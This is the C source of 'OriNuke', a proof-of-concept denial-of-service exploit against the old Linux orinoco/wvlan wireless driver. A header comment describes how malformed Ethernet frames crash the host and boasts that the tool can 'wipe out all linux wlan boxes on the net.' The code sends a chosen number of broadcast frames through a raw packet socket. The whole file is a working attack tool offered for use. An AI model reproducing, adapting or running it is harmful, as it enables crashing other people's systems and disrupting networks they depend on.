/*******************************************************
 *
 * OriNuke - Orinoco Wavelan Nuker
 * ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
 *
 * The old orinoco/wvlan driver ( < orinoco_cs 0.11)
 * didn't check for under- oder oversized ethernet
 * frames -> after receiving such a frame, the whole
 * box crashed/rebooted...
 *
 * Since the bug finally has been fixed, here is a 
 * simple proof of concept exploit... there should
 * still be enough vulnerable boxes out there...
 *
 * By sending a few of these broken ethernet frames
 * you can wipe out all linux wlan boxes on the net.
 *
 * Keep in mind, that you need a wired box to send
 * the nukes unless your wireless box can really spoof 
 * on ethernet level.
 *
 * Greetings fly to: 
 *   DigiDust, Anarchy, Hunz, bullet, huega, Mike, 
 *   Macrotron, koerk ...
 *
 * 
 * Have phun,
 *  gh0st
 * 
 ******************************************************/

#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
#include <errno.h>
#include <sys/socket.h>              
#include <netinet/in.h>            
#include <net/ethernet.h>              

int main(int argc, char **argv) {
  int sock, ret, i, numnukes;
  char *packet, device[1024];
  struct sockaddr  sa;

  packet=malloc(64);
  memset(packet,0,64);
  memset(packet,0xff,6);

  printf("[[ OriNuke - WaveLAN Nuker ]]\n - written by gh0st\n\n");
  
  if(argc<3) {
    printf(" Usage: %s <interface> <numnukes>\n\n", argv[0]);
    return -1;
  }

  strncpy(device,argv[1],1024);
  numnukes=atoi(argv[2]);
      
  if((sock=socket(PF_INET, SOCK_PACKET, htons(ETH_P_ALL)))<0){
    perror("Error creating socket");
    return -1;
  }
  
  memset(&sa,0,sizeof(sa));
  strncpy(sa.sa_data,device,sizeof(sa.sa_data));

  printf("Sending nukes: ");
  for(i=0;i<numnukes;i++) {
    ret=sendto(sock,packet,64,0,&sa,sizeof(sa));
    printf(".");
  }
  printf("\n\nPeace!\n");

  free(packet);
  close(sock);
  return 0;
}